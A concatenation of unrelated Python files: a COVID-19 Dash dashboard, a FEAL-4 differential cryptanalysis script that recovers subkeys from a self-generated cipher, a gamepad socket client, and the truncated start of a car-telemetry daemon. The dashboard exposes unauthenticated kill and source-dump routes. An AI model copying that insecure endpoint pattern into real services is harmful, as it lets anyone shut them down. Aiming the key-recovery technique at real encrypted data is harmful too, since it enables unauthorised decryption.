'-oldtag02=%23affected%2Bdate&rename-newtag02=%23date&rename-header02=Date&filter03=rename&rename'
'-oldtag03=%23affected%2Bvalue&rename-newtag03=%23affected%2Binfected%2Bvalue%2Bnum&rename-header03'
'=Value&filter04=clean&clean-date-tags04=%23date&filter05=sort&sort-tags05=%23date&sort-reverse05=on'
'&filter06=sort&sort-tags06=%23country%2Bname%2C%23adm1%2Bname&tagger-match-all=on&tagger-default-tag'
'=%23affected%2Blabel&tagger-01-header=province%2Fstate&tagger-01-tag=%23adm1%2Bname&tagger-02-header'
'=country%2Fregion&tagger-02-tag=%23country%2Bname&tagger-03-header=lat&tagger-03-tag=%23geo%2Blat'
'&tagger-04-header=long&tagger-04-tag=%23geo%2Blon&header-row=1&url=https%3A%2F%2Fraw.githubusercontent'
'.com%2FCSSEGISandData%2FCOVID-19%2Fmaster%2Fcsse_covid_19_data%2Fcsse_covid_19_time_series'
'%2Ftime_series_covid19_confirmed_global.csv',
'deaths': 'https://data.humdata.org/hxlproxy/data/download/time_series_covid19_deaths_global_narrow.csv?dest'
'=data_edit&filter01=explode&explode-header-att01=date&explode-value-att01=value&filter02=rename&rename'
'-oldtag02=%23affected%2Bdate&rename-newtag02=%23date&rename-header02=Date&filter03=rename&rename'
'-oldtag03=%23affected%2Bvalue&rename-newtag03=%23affected%2Binfected%2Bvalue%2Bnum&rename-header03'
'=Value&filter04=clean&clean-date-tags04=%23date&filter05=sort&sort-tags05=%23date&sort-reverse05=on'
'&filter06=sort&sort-tags06=%23country%2Bname%2C%23adm1%2Bname&tagger-match-all=on&tagger-default-tag'
'=%23affected%2Blabel&tagger-01-header=province%2Fstate&tagger-01-tag=%23adm1%2Bname&tagger-02-header'
'=country%2Fregion&tagger-02-tag=%23country%2Bname&tagger-03-header=lat&tagger-03-tag=%23geo%2Blat'
'&tagger-04-header=long&tagger-04-tag=%23geo%2Blon&header-row=1&url=https%3A%2F%2Fraw.githubusercontent'
'.com%2FCSSEGISandData%2FCOVID-19%2Fmaster%2Fcsse_covid_19_data%2Fcsse_covid_19_time_series'
'%2Ftime_series_covid19_deaths_global.csv',
'recovered': 'https://data.humdata.org/hxlproxy/data/download/time_series_covid19_recovered_global_narrow.csv'
'?dest=data_edit&filter01=explode&explode-header-att01=date&explode-value-att01=value&filter02'
'=rename&rename-oldtag02=%23affected%2Bdate&rename-newtag02=%23date&rename-header02=Date&filter03'
'=rename&rename-oldtag03=%23affected%2Bvalue&rename-newtag03=%23affected%2Binfected%2Bvalue%2Bnum'
'&rename-header03=Value&filter04=clean&clean-date-tags04=%23date&filter05=sort&sort-tags05=%23date'
'&sort-reverse05=on&filter06=sort&sort-tags06=%23country%2Bname%2C%23adm1%2Bname&tagger-match-all=on'
'&tagger-default-tag=%23affected%2Blabel&tagger-01-header=province%2Fstate&tagger-01-tag=%23adm1'
'%2Bname&tagger-02-header=country%2Fregion&tagger-02-tag=%23country%2Bname&tagger-03-header=lat'
'&tagger-03-tag=%23geo%2Blat&tagger-04-header=long&tagger-04-tag=%23geo%2Blon&header-row=1&url=https'
'%3A%2F%2Fraw.githubusercontent.com%2FCSSEGISandData%2FCOVID-19%2Fmaster%2Fcsse_covid_19_data'
'%2Fcsse_covid_19_time_series%2Ftime_series_covid19_recovered_global.csv',
}
EU = ['Austria', 'Belgium', 'Bulgaria', 'Croatia', 'Cyprus', 'Czechia', 'Denmark', 'Estonia', 'Finland', 'France',
'Germany', 'Greece', 'Hungary', 'Ireland', 'Italy', 'Latvia', 'Lithuania', 'Luxembourg', 'Malta', 'Netherlands',
'Poland', 'Portugal', 'Romania', 'Slovakia', 'Slovenia', 'Spain', 'Sweden']
def create_layout(keys: list = None, shown_keys: list = None, ds: str = '', ) -> {str: dhc.Div}:
keys = keys or ['Loading...']
shown_keys = shown_keys or keys[0]
page_title = '{} {}'.format(app_title, ds)
report_date = dt.datetime.now().strftime('%H:%M %d-%b-%Y')
link_style = {'text-decoration': 'none'}
log_link = dhc.A(u'\u2317 ', title='Logs', href=ld_link, target='_blank', style=link_style) if ld_file else ''
return {
'report_date': report_date,
'Loading...': dhc.Div('Loading ...'),
'layout': dhc.Div([
dhc.H3([dhc.A(u'\u2388 ', href='/', style=link_style, title='Refresh'), page_title]),
dcc.Dropdown(id='chart', options=[{'label': k, 'value': k} for k in keys], value=shown_keys, multi=True),
dhc.Div(id='page-content', style={'min-height': '600px'}),
dhc.I([log_link, dhc.A(u'\u2318 ', title='Code', href=code_link, target='_blank', style=link_style),
'created: {}'.format(report_date), ]), ]), }
cache = create_layout()
cache_loop_lock = threading.Lock()
cache_update_lock = threading.Lock()
def format_num(n: float) -> str:
suffixes = ['', ' Thousand', ' Million', ' Billion']
i = max(0, min(3, int(math.floor(0 if n == 0 else math.log10(abs(n)) / 3))))
return ('{:,.0f}'.format(n) if int(n) == n else '{:,.2f}'.format(n)) if i <= 1 \
else '{:,.3f}{}'.format(n / 10 ** (3 * i), suffixes[i])
def log_message(*msg: str) -> None:
print('- - -', dt.datetime.now().strftime('[%d/%b/%Y %H:%M:%S]'), ' '.join(msg), flush=True)
# retrieve data from URL and return Pandas DataFrame
def data_frame_from_url(url: str) -> pd.DataFrame:
try:
return pd.read_csv(io.StringIO(requests.get(url).content.decode()))
except Exception as e:
log_message('error retrieving url {}'.format(url))
raise e
finally:
log_message('retrieved url {}'.format(url))
# Population Data
def get_population() -> pd.DataFrame:
population = data_frame_from_url(URLS['population'])[['Country', 'Country_Code', 'Year_2016']]
population.columns = ['Country', 'Code', 'Population']
for country, name_change, missing_data in [
['Bahamas, The', 'Bahamas', None], ['Brunei Darussalam', 'Brunei', None],
['Congo, Dem. Rep.', 'Congo (Kinshasa)', None], ['Congo, Rep.', 'Congo (Brazzaville)', None],
['Czech Republic', 'Czechia', None], ['Egypt, Arab Rep.', 'Egypt', None], ['Gambia, The', 'Gambia', None],
['Iran, Islamic Rep.', 'Iran', None], ['Korea, Rep.', 'Korea, South', None],
['Kyrgyz Republic', 'Kyrgyzstan', None], ['Lao PDR', 'Laos', None], ['Macedonia, FYR', 'North Macedonia', None],
['Myanmar', 'Burma', None], ['Russian Federation', 'Russia', None], ['Slovak Republic', 'Slovakia', None],
['Syrian Arab Republic', 'Syria', None], ['Venezuela, RB', 'Venezuela', None], ['Yemen, Rep.', 'Yemen', None],
['Taiwan', None, ['TWN', 23780452]]
]:
if name_change:
population.Country = population.Country.str.replace(pat=country, repl=name_change, regex=False)
if missing_data:
population.loc[len(population)] = [country] + missing_data
return population
# Retrieve Covid-19 Data
def get_covid19_data(metric: str) -> pd.DataFrame:
df = data_frame_from_url(URLS[metric]).drop(0)[['Country/Region', 'Province/State', 'Date', 'Value']]
df.Date = pd.to_datetime(df.Date)
df.Value = df.Value.astype(int)
df = df.groupby(['Country/Region', 'Date']).sum().reset_index()
df.columns = ['Country', 'Date', metric.title()]
df.Country = df.Country \
.str.replace(pat='Taiwan*', repl='Taiwan', regex=False) \
.str.replace(pat='US', repl='United States', regex=False)
return df.sort_values(by=['Country', 'Date'])
# Transform Covid-19 Data
def transform_covid19_data(population: pd.DataFrame, cases: pd.DataFrame, deaths: pd.DataFrame) -> pd.DataFrame:
df = pd.merge(cases, deaths, on=['Country', 'Date'], how='inner')
eu = df[df.Country.isin(EU)].groupby('Date').sum().reset_index('Date').sort_values('Date')
eu['Country'] = 'European Union'
world = df.groupby('Date').sum().reset_index('Date').sort_values('Date')
world['Country'] = 'World'
df = pd.concat([df, eu, world])
df = pd.merge(df, population, on=['Country'], how='left').dropna()
df = df[['Country', 'Date', 'Code', 'Population', 'Cases', 'Deaths']]
df = df.set_index(['Country', 'Date'])
df['DailyCases'] = df.Cases.diff(1)
df['DailyCases'][df['DailyCases'] < 0] = np.nan
df['DailyMeanCases'] = df.Cases.diff(7) / 7
df['DailyMeanCases'][df['DailyMeanCases'] < 0] = np.nan
df['DailyRateCases'] = df.DailyMeanCases.diff(7) / 7
df['DailyMeanCases'] = df['DailyMeanCases'].round(0)
df['DailyDeaths'] = df.Deaths.diff(1)
df['DailyDeaths'][df['DailyDeaths'] < 0] = np.nan
df['DailyMeanDeaths'] = df.Deaths.diff(7) / 7
df['DailyMeanDeaths'][df['DailyMeanDeaths'] < 0] = np.nan
df['DailyRateDeaths'] = df.DailyMeanDeaths.diff(7) / 7
df['DailyMeanDeaths'] = df['DailyMeanDeaths'].round(0)
df['WeeklyCases'] = df.Cases.diff(7)
df['WeeklyCases'][df['WeeklyCases'] < 0] = np.nan
df['CPM'] = 10 ** 6 * df.Cases / df.Population
df['WeeklyCPM'] = 10 ** 6 * df.WeeklyCases / df.Population
df['DailyCPM'] = df.WeeklyCPM / 7
df['DailyRateCPM'] = df.DailyCPM.diff(7) / 7
df['WeeklyDeaths'] = df.Deaths.diff(7)
df['WeeklyDeaths'][df['WeeklyDeaths'] < 0] = np.nan
df['DPM'] = 10 ** 6 * df.Deaths / df.Population
df['WeeklyDPM'] = 10 ** 6 * df.WeeklyDeaths / df.Population
df['DailyDPM'] = df.WeeklyDPM / 7
df['DailyRateDPM'] = df.DailyDPM.diff(7) / 7
df['CFR'] = 100 * df.Deaths / df.Cases
df['CRR'] = ((df.WeeklyCases / df.WeeklyCases.shift(7)) ** (1 / 7)).replace(np.inf, np.nan)
df['DRR'] = ((df.WeeklyDeaths / df.WeeklyDeaths.shift(7)) ** (1 / 7)).replace(np.inf, np.nan)
return df
# Convert Figure to Graph
def graph(figure, **kwargs) -> dcc.Graph:
return dcc.Graph(figure=figure.update_layout(height=800, title_x=0.5, **kwargs))
# Plot overview with country comparisons
def plot_comparison(df: pd.DataFrame, regions: list, last_date: dt.datetime) -> {str, dhc.Div}:
df_now = df.xs(last_date, axis=0, level=1).fillna(0).reset_index()
df_geo = df_now[~df_now.Country.isin(['World', 'European Union'])]
rag_scale = [(0.0, 'green'), (0.0625, 'yellow'), (0.25, 'orange'), (1.0, 'red')]
color_palette = ['#FD3216', '#00FE35', '#6A76FC', '#FED4C4', '#FE00CE', '#0DF9FF', '#F6F926', '#FF9616',
'#479B55', '#EEA6FB', '#DC587D', '#D626FF', '#6E899C', '#00B5F7', '#B68E00', '#C9FBE5',
'#FF0092', '#22FFA7', '#E3EE9E', '#86CE00', '#BC7196', '#7E7DCD', '#FC6955', '#E48F72']
# Plot single metric for select countries
def plot_time_series(col: str, label: str, **kwargs) -> dcc.Graph:
return graph(figure=df[col].unstack().transpose()[regions]
.figure(title=label, colors=color_palette, theme='solar', **kwargs),
legend_orientation='h', hovermode='x')
# Plot current value of single metric for every country
def plot_current(col: str, label: str, drop: list, **kwargs) -> dcc.Graph:
ds = df_now[~df_now.Country.isin(drop)][['Country', col]].nlargest(42, columns=col).sort_values(by=col)
return graph(figure=ds.figure(title=label, x='Country', y=col, kind='bar', orientation='h', **kwargs),
hovermode='y')
# Plot Scatter of current values of two metrics for every country, optional size and/or color
def plot_scatter(x: str, y: str, label: str, color: str = '', size: str = '',
drop: list = (), cutoff: int = 0) -> dcc.Graph:
params = {'x': x, 'y': y, 'title': label,
'hover_name': 'Country', 'hover_data': ['Population', 'Cases', 'Deaths', 'CPM', 'DPM', 'CFR'],
**({'color': color, 'color_continuous_scale': rag_scale} if color else {}),
**({'size': size} if size else {})}
return graph(figure=px.scatter(df_now[(~df_now.Country.isin(drop)) & (df_now.Deaths > cutoff)], **params))
# Plot single metric for every country on a map
def plot_geo(col: str, label: str, color_countries: bool, colors: list = ()) -> dcc.Graph:
colors = rag_scale if color_countries else colors if colors else ['#4C33FF']
plotter = px.choropleth if color_countries else px.scatter_geo
params = {'title': label, 'locations': 'Code',
'hover_name': 'Country', 'hover_data': ['Population', 'Cases', 'Deaths', 'CPM', 'DPM', 'CFR'],
**({'color': col, 'color_continuous_scale': colors} if color_countries
else {'size': col, 'color_discrete_sequence': colors})}
return graph(figure=plotter(df_geo, **params).update_geos(
resolution=50, showcountries=True, countrycolor='#663399', showcoastlines=True, coastlinecolor='#663399',
showland=True, landcolor='#E3E3E3', showocean=True, oceancolor='#ADD8E6',
showlakes=True, lakecolor='#ADD8E6', showrivers=True, rivercolor='#ADD8E6'))
return {
'Scatter': dhc.Div([chart for chart in [
plot_scatter(x='CPM', y='DPM', size='DPM', color='CFR', cutoff=1000,
label='Cases per Million vs Deaths per Million', ), ]]),
'Current Cases': dhc.Div([chart for chart in [
plot_current(col='Cases', label='Cases', drop=['World'], theme='polar', color=['#4C33FF']),
plot_current(col='CPM', label='Cases Per Million', drop=[], theme='polar', color=['#4C33FF']), ]]),
'Current Deaths': dhc.Div([chart for chart in [
plot_current(col='Deaths', label='Deaths', drop=['World'], theme='polar', color=['#C70039']),
plot_current(col='DPM', label='Deaths Per Million', drop=[], theme='polar', color=['#C70039']), ]]),
'Maps Cases': dhc.Div([chart for chart in [
plot_geo(col='Cases', label='Total Cases', color_countries=True),
plot_geo(col='WeeklyCases', label='Last Week Total Cases', color_countries=True),
plot_geo(col='CPM', label='Cases/Million', color_countries=True, colors=rag_scale),
plot_geo(col='WeeklyCPM', label='Last Week Cases/Million', color_countries=True), ]]),
'Maps Deaths': dhc.Div([chart for chart in [
plot_geo(col='Deaths', label='Total Deaths', color_countries=True),
plot_geo(col='WeeklyDeaths', label='Last Week Total Deaths', color_countries=True),
plot_geo(col='DPM', label='Deaths/Million', color_countries=True),
plot_geo(col='WeeklyDPM', label='Last Week Deaths/Million', color_countries=True), ]]),
'Time-series Cases': dhc.Div([chart for chart in [
plot_time_series(col='Cases', label='Total Cases'),
plot_time_series(col='WeeklyCases', label='Weekly Cases (last 7 days)', kind='bar'),
plot_time_series(col='CPM', label='Cases Per Million'),
plot_time_series(col='WeeklyCPM', label='Weekly Cases/Million', kind='bar'), ]]),
'Time-series Deaths': dhc.Div([chart for chart in [
plot_time_series(col='Deaths', label='Total Deaths'),
plot_time_series(col='WeeklyDeaths', label='Weekly Deaths (last 7 days)', kind='bar'),
plot_time_series(col='DPM', label='Deaths Per Million'),
plot_time_series(col='WeeklyDPM', label='Weekly Deaths/Million', kind='bar'), ]]),
'Time-series Rates': dhc.Div([chart for chart in [
plot_time_series(col='CFR', label='Case Fatality Rate (%)'),
plot_time_series(col='CRR', label='7 Day Mean Reproduction Rate - Cases', logy=True),
plot_time_series(col='DRR', label='7 Day Mean Reproduction Rate - Deaths', logy=True), ]]),
}
# Plot regional charts
def plot_regions(df: pd.DataFrame, regions: list, last_date: dt.datetime) -> {str, dhc.Div}:
columns, colors, titles = (list(x) for x in zip(
('Cases', '#4C33FF', 'Total Cases'),
('Deaths', '#C70039', 'Attributed Deaths'),
('DailyCases', '#4C33FF', 'Cases/Day'),
('DailyDeaths', '#C70039', 'Deaths/Day'),
('DailyMeanCases', '#4C33FF', '7 Day Average Cases/Day'),
('DailyMeanDeaths', '#C70039', '7 Day Average Deaths/Day'),
('DailyRateCases', '#4C33FF', 'Change 7 Day Average Cases/Day/Day'),
('DailyRateDeaths', '#C70039', 'Change 7 Day Average Deaths/Day/Day'),
))
def plot_region(region: str) -> dcc.Graph:
summary_values = [format_num(int(x)) for x in
df.loc[region].loc[last_date][['Population', 'Cases', 'Deaths', 'CPM', 'DPM', 'CFR']]]
title = '<b>{}</b>: ' \
'<b>{}</b> People, ' \
'<b>{}</b> Cases, ' \
'<b>{}</b> Deaths,<BR> ' \
'<b>{}</b> Cases/Mil, ' \
'<b>{}</b> Deaths/Mil, ' \
'<b>{}%</b> Case Fatality Rate ' \
'<i> as on {}</i><BR><BR>'.format(region, *summary_values, last_date.strftime('%d %b %Y'))
return graph(figure=df.loc[region][columns].figure(theme='polar', title=title, subplots=True, shape=(4, 2),
legend=False, colors=colors, subplot_titles=titles),
hovermode='x')
return {region: dhc.Div(plot_region(region)) for region in regions}
# Cufflinks
cf.go_offline()
# Dash
app = dash.Dash(__name__, external_stylesheets=['https://codepen.io/chriddyp/pen/bWLwgP.css'])
app.title = app_title
app.layout = lambda: cache['layout']
# Flask
server = app.server
@app.callback(dash.dependencies.Output('page-content', 'children'), [dash.dependencies.Input('chart', 'value')])
def update_output(value):
return [cache[v] for v in value] if isinstance(value, list) else cache[value]
def update_cache() -> bool:
if not cache_update_lock.locked():
with cache_update_lock:
log_message('Updating Cache')
cache['population'] = population = cache.get('population', get_population())
df = transform_covid19_data(population, cases=get_covid19_data('cases'), deaths=get_covid19_data('deaths'))
last_date = max(df.index.get_level_values(level=1))
regions = list(df.xs(last_date, axis=0, level=1).sort_values(by='Deaths', ascending=False).index)
short_list = regions[0:32]
cache.update(comparison_charts := plot_comparison(df, short_list, last_date))
cache.update(plot_regions(df, regions, last_date))
cache.update(create_layout(keys=list(sorted(comparison_charts.keys())) + regions, shown_keys=short_list,
ds=last_date.strftime('%d %b %Y')))
log_message('Cache Updated')
return True
return False
# Refresh every 12th hour (43200 seconds) offset by 8 hrs (28800 - 7200 CET offset from UTC) i.e. 08:00, 20:00 CET
@server.before_first_request
def update_cache_in_background():
def loop_update_cache():
if not cache_loop_lock.locked():
with cache_loop_lock:
if platform.system() == 'Darwin':
__import__('caffeine') # import has side-effects
while True:
try:
update_cache()
except Exception as e:
log_message('Exception occurred while updating cache\n', str(e))
next_reload_data_at = time.time() + 3600
else:
next_reload_data_at = ((1 + (int(time.time()) // 43200)) * 43200) + 21600
while (wait := next_reload_data_at - int(time.time())) > 0:
log_message('next reload ' + dt.datetime.fromtimestamp(next_reload_data_at).strftime('%H:%M'))
time.sleep(wait / 2)
if not cache_loop_lock.locked():
threading.Thread(target=loop_update_cache, daemon=True).start()
@server.route(status_link)
def status():
return 'updating cache' if cache_update_lock.locked() \
else 'serving {} items cached at {}'.format(len(cache), cache['report_date'])
def text_box(lines: [str, ...]) -> str:
rows = len(lines)
cols = max(len(line) for line in lines)
return '{0}{1} rows={4} cols={5} {2}{3}{0}/{1}{2}'.format('<', 'textarea', '>', '\n'.join(lines), rows, cols)
@server.route(code_link)
def code():
page = '<html><head></head><body>{}</body></html>'
return page.format(text_box(lines=inspect.getsource(sys.modules[__name__]).splitlines()))
@server.route(ld_link)
def logs():
page = '<html><head><meta http-equiv="refresh" content="10"></head><body>{}</body></html>'
if ld_file:
with open(ld_file) as infile:
return page.format(text_box([line.strip() for line in infile.readlines()]))
return page.format('')
@server.route(reload_data_link)
def reload_data():
return 'Reloaded ...' if update_cache() else 'Reloading in progress ...'
@server.route(kill_link)
def shutdown():
cmd = flask.request.environ.get('werkzeug.server.shutdown')
return 'Oops ...' if cmd is None else 'Killed' if cmd() is None else 'Hmmm ...'
def client(host_address, client_port, payload) -> str:
try:
return requests.get('http://{}:{}{}'.format(host_address, client_port, payload)).content.decode()
except requests.exceptions.ConnectionError:
return ''
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Plot Wuhan Corona Virus Covid-19 Impact around the World')
parser.add_argument('-a', '--address', type=str, help='interface address, default 0.0.0.0 (127.0.0.1 with -d)')
parser.add_argument('-p', '--port', type=int, help='interface port, default 8050 (8060 with -d)')
parser.add_argument('-d', '--dev', action='store_true', help='use cached downloads only, default false')
parser.add_argument('-k', '--kill', action='store_true', help='send kill payload to server')
parser.add_argument('-r', '--reload', action='store_true', help='send reload data payload to server')
parser.add_argument('-s', '--status', action='store_true', help='print server status')
args = parser.parse_args()
host = args.address or ('127.0.0.1' if args.dev else '0.0.0.0')
port = args.port or (8060 if args.dev else 8050)
client_cmd = kill_link if args.kill else reload_data_link if args.reload else status_link if args.status else ''
if client_cmd:
if response := client(host_address=host, client_port=port, payload=client_cmd):
log_message(response)
else:
log_message('http://{}:{} is down'.format(host, port))
exit(1)
else:
ld_file = os.path.abspath(__file__)[:-3] + ('-d.log' if args.dev else '.log')
cache = create_layout()
if args.dev:
__import__('requests_cache').install_cache('cache', expire_after=12 * 3600)
__import__('atexit').register(log_message, 'http://{}:{} down'.format(host, port))
log_message('http://{}:{} up'.format(host, port))
app.run_server(host=host, port=port)
|
differential_cryptanalysis.py
|
from collections import namedtuple, defaultdict
from FEAL import FEAL, XOR, round_function
from multiprocessing import Process, Queue
import itertools
import os
DifferentialPair = namedtuple('DifferentialPair', ['m1', 'm2', 'c1', 'c2'])
def gen_random_bytes(length):
return map(ord, os.urandom(length))
def make_diff_pair(num, cipher, diff):
ret = []
for i in xrange(num):
m1 = gen_random_bytes(8)
m2 = XOR(m1, diff)
c1 = cipher.encrypt(m1)
c2 = cipher.encrypt(m2)
ret += [DifferentialPair(m1, m2, c1, c2)]
return ret
def search_inner(k_cand_base, pairs, delta, queue):
for k_cand_3 in range(64):
for k_cand_base2 in itertools.product(range(256), repeat=3):
score = 0
k_cand = [16*k_cand_base[0] + k_cand_3, k_cand_base2[0], k_cand_base2[1], k_cand_base2[2]]
for pair in pairs:
L1, R1 = pair.c1[:4], pair.c1[4:]
L2, R2 = pair.c2[:4], pair.c2[4:]
diff1 = round_function(XOR(R1, k_cand))
diff2 = round_function(XOR(R2, k_cand))
outDiff = XOR(XOR(L1, L2), delta)
diff = XOR(diff1, diff2)
if diff == outDiff:
score += 1
else:
break
if score == len(pairs):
print '[+] Found key: %r' % (k_cand, )
queue.put(k_cand)
return
def search_round_delta(pairs, delta):
print '[+] Searching subkey which has difference %r...' % delta
q = Queue()
processes = []
for k_cand_base1 in range(4):
p = Process(target=search_inner, args=([k_cand_base1], pairs, delta, q))
p.start()
processes += [p]
k_cand = q.get(True)
for p in processes:
p.terminate()
return k_cand
def search_first(pairs):
pair = pairs[0]
R1, L1 = pair.c1[:4], pair.c1[4:]
R2, L2 = pair.c2[:4], pair.c2[4:]
mL1, mR1 = pair.m1[:4], pair.m1[4:]
mL2, mR2 = pair.m2[:4], pair.m2[4:]
R1 = XOR(L1, R1)
R2 = XOR(L2, R2)
k4 = XOR(L1, mL1)
k5 = XOR(R1, mR1)
if XOR(L1, mL1) != XOR(L2, mL2) or XOR(R1, mR1) != XOR(R2, mR2):
return None, None
return k4, k5
def round_inverse(pairs, k):
ret = []
for pair in pairs:
L1, R1 = pair.c1[:4], pair.c1[4:]
L2, R2 = pair.c2[:4], pair.c2[4:]
L1 = XOR(round_function(XOR(R1, k)), L1)
L2 = XOR(round_function(XOR(R2, k)), L2)
c1 = R1 + L1
c2 = R2 + L2
ret += [DifferentialPair(pair.m1, pair.m2, c1, c2)]
return ret
def inverse_last(pairs):
ret = []
for pair in pairs:
L1, R1 = pair.c1[:4], pair.c1[4:]
L2, R2 = pair.c2[:4], pair.c2[4:]
R1 = XOR(L1, R1)
R2 = XOR(L2, R2)
c1 = R1 + L1
c2 = R2 + L2
ret += [DifferentialPair(pair.m1, pair.m2, c1, c2)]
return ret
def main():
k = [gen_random_bytes(4) for _ in xrange(4 + 2)]
cipher = FEAL(4, k)
m = gen_random_bytes(8)
print '[+] Target Message: %r' % m
print '[+] Target Subkeys: %r' % (k)
c = cipher.encrypt(m)
pair = make_diff_pair(2048, cipher, [0x80, 0x80, 0, 0, 0x80, 0x80, 0, 0])
pair = inverse_last(pair)
k3 = search_round_delta(pair, [2, 0, 0, 0])
pair = round_inverse(pair, k3)
k2 = search_round_delta(pair, [0x80, 0x80, 0, 0])
pair = make_diff_pair(2048, cipher, [0x80, 0x80, 0, 0, 0, 0, 0, 0])
pair = inverse_last(pair)
pair = round_inverse(pair, k3)
pair_ = round_inverse(pair, k2)
k1 = search_round_delta(pair_, [0x80, 0x80, 0, 0])
if k1 is None:
pair_ = round_inverse(pair, XOR(k2, [2, 0, 0, 0]))
k1 = search_round_delta(pair_, [0x80, 0x80, 0, 0])
k2 = XOR(k2, [2, 0, 0, 0])
pair = make_diff_pair(2048, cipher, [0x90, 0x90, 0, 0, 0x92, 0x90, 0, 0])
pair = inverse_last(pair)
pair = round_inverse(pair, k3)
pair = round_inverse(pair, k2)
pair_ = round_inverse(pair, k1)
k0 = search_round_delta(pair_, [0x90, 0x90, 0, 0])
if k0 is None:
pair_ = round_inverse(pair, XOR(k1, [2, 0, 0, 0]))
k0 = search_round_delta(pair_, [0x90, 0x90, 0, 0])
k1 = XOR(k1, [2, 0, 0, 0])
pair = make_diff_pair(2048, cipher, [0, 0, 0, 0, 0, 0, 0, 1])
pair = inverse_last(pair)
pair = round_inverse(pair, k3)
pair = round_inverse(pair, k2)
pair = round_inverse(pair, k1)
pair_ = round_inverse(pair, k0)
k4, k5 = search_first(pair_)
if k4 is None:
pair_ = round_inverse(pair, XOR(k0, [2, 0, 0, 0]))
k4, k5 = search_first(pair_)
k0 = XOR(k0, [2, 0, 0, 0])
print '[+] Subkeys: %r' % ([k0, k1, k2, k3, k4, k5])
cipher_ = FEAL(4, [k0, k1, k2, k3, k4, k5])
m2 = cipher_.decrypt(c)
print '[+] Decrypted Ciphertext: %r' % m2
print '[+] Check: %s' % (m == m2)
if __name__ == '__main__':
main()
|
client.py
|
import socket #import socket module
import time
import inputs
import threading
def receiveData(client):
while(True):
data = client.recv(1024).decode()
#print(data)
def sendData(client):
while(True):
try:
events = inputs.get_gamepad()
sendString = "connected:1:b,"
for event in events:
if(event.ev_type == "Absolute"):
sendString += event.code + ":" + str(event.state) + ":i,"
elif(event.ev_type == "Key"):
sendString += event.code + ":" + str(event.state) + ":b,"
except inputs.UnpluggedError:
sendString = "connected:0:b,"
time.sleep(0.1)
sendString = sendString[:-1] #Remove ending ","
client.send(sendString.encode())
#time.sleep(0.005)
print("Start")
ss = socket.socket() #create a socket object
ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
cs = socket.socket() #create a socket object
cs.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
cport = 12397 # Reserve a port for your service
cs.bind(('', cport)) #Bind to the port
cs.listen(5) #Wait for the client connection
c,addr = cs.accept() #Establish a connection
print("Laptop -> Pi Connected")
host = '192.168.1.42' #Host i.p
sport = 12396 #Reserve a port for your service
ss.connect((host,sport))
print("Pi -> Laptop Connected")
print ("Test")
tot = time.time()
sumTime = 0
dic = {}
receiveThread = threading.Thread(target=receiveData, args=(ss,))
sendThread = threading.Thread(target=sendData, args=(c,))
receiveThread.start()
sendThread.start()
'''
for i in range(0,100000):
print("start")
start=time.time()
data = ss.recv(1024).decode()
print("Recieve")
#print(data)
data = data.split(",")
for pair in data:
item = pair.split(":")
if(item[2] == "b"):
cast = bool
elif(item[2]=="i"):
cast = int
elif(item[2] == "f"):
cast = float
else:
cast = str
#print("Item[0]:" + item[0] + "Item
dic[item[0]] = cast(item[1])
print(str(dic))
print("done")
end = time.time()
sumTime = sumTime + (end-start)
#print ((cs.recv(1024)).decode())
'''
tot = time.time() - tot
sumTime = sumTime/100.0
print (tot, ' ',sumTime)
cs.close
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_git_remote, get_git_branch, get_git_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://api.retropilot.org:4040')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id'])
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
while not end_event.is_set():
try:
item = upload_queue.get(timeout=1)
if item.id in cancelled_uploads:
cancelled_uploads.remove(item.id)
continue
_do_upload(item)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
